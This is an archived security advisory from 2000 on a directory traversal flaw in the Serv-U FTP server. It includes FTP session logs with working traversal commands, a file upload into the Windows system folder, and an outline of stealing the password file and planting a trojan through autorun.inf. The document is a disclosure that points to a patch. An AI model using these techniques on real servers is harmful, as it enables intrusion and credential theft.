exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Securax-SA-09.serv-u

Securax-SA-09.serv-u
Posted Dec 5, 2000
Authored by Zoa_Chien | Site securax.org

Securax Security Advisory Securax-SA-09 - The Serv-U FTP server for Windows v 2.4a, 2.5h, and 3.0b (all versions tested) have vulnerabilities stemming from improper handling of hex encoded characters in ftp commands. The server will reveal the full path to the ftproot, allow read/write/execute/list access to any other file on the partition, and allow listing of all hidden files. Fix available here.

tags | exploit, vulnerability
systems | windows
SHA-256 | e6a9f7a08b79162569e6194cad0956887de19d672150ee61fc642ddb1f1d8c63

Securax-SA-09.serv-u

Change Mirror Download

=====================================================================
Securax-SA-09 Security Advisory
belgian.networking.security Dutch
=====================================================================
Topic: Catsoft serv-U FTP Directory Transversal Vulnerability
Announced: 2000-12-03
Updated: 2000-12-03
tested on: serv-U ftp 2.4a, 2.5h, 3.0b├Ęta,... (all versions ?)
Not affected: ?
Obsoletes: /
http://www.securax.org/pers/
=====================================================================

THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR
RESULTS. THEREFORE WE CANNOT ENSURE THE INFORMATION BELOW IS
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
NOTICE.
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING
THE BUG DISCUSSED IN THIS ADVISORY, SHARE THIS ON BUQTRAQ.
THANK YOU,



I. Background

Lets just dump what i tried: (skip this)


Normal use: 1.txt is a file in the homedir.
ftp> get 1.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)

Lets see what happens to hex codes: %2E=. %31=1 %20=space ...

ftp> get 1%2etxt
200 PORT Command successful.
550 /1%2etxt: No such file or directory.
ftp>

--> %2e is not decoded

ftp> get 1.%20txt
200 PORT Command successful.
550 /1. txt: No such file or directory.

--> %20 is decoded to a space. (to be compatible with browsers)

ftp> get %201.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)

--> hey, look if the space is in the beginning of the filename,
it is just skipped.

Lets try this on the cd command:

ftp> cd \.a%20\
550 /.a: No such file or directory.

--> space is skipped again...

ftp> cd \a%20a\
550 /a a: No such file or directory.
ftp>

ftp> cd \a%20.\
550 /a: No such file or directory.
ftp>

--> heh ? wtf, the %20 will remove the .

Lets try to play around with that:

ftp> cd \.%20.
250 Directory changed to /Ftproot

--> Hey, look the ftp client reveals the ftp dir... thats fun

Lets keep playing

ftp> cd \..%20.
250 Directory changed to /..

--> oh ow, this looks like trouble

ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
-rwxrwxrwx 1 user group 1127 Nov 30 22:06 rootdir.txt
...
226 Transfer complete.
1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)
ftp>

Ouch, that hurts...

ftp> cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
ftp>

You can only use this when you are in your homedir.
You can only use GET ... when you are in your homedir
so first changing to /winnt and then "get" will not work

ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\


II. Problem Description

- Serv-U ftp will:
reveal the full path to the ftproot with: cd \.%20.
(even if "show path relative to home dir"-option is on )
Using pwd will work too.

- allow read/write/execute/list axx to any other file on
the partition of the ftproot if you have read/write/exec/list
acces on your home dir.
note that the option inherit subdirs must be clicked on.
(otherwise "cd" will not work)
- Serv-U will allow listing of hidden files, even if
"hide hidden files is on" with "DIR ."

- The exploit also works on serv-U ftp 2.4a... but you might
have to use a different string.:
dir %20..%20%20..\*.

III. Impact:

This is a severe bug and should be patched asap.
If the ftproot is on the c:drive, serv-U.ini can be retrieved
which contains all passwords of the ftp users.
(and can be brute forced with john the ripper)
That way, you could find logins that allow executing... and
you can upload and execute a trojan.

Even if the ftproot is not on the same drive as serv-u.ini,
you can still upload a trojan and make this trojan execute
by using an autorun.inf on e.g.: d:\ wich points to our trojan
If the sysadmin uses "My Computer" instead of explorer.exe,
the trojan will be executed.

IV. Solution

Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/

V. Credits

Zoa_Chien (zoachien@securax.org)
Elias (pwd revealing full path)

VI. Source code
none.


---
... And they will all go down together ...

Advertising:
[Zoa_Chien is currently looking for a new job, contact me at
zoachien@securax.org +32/496.45.29.89 for a resume.]




Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close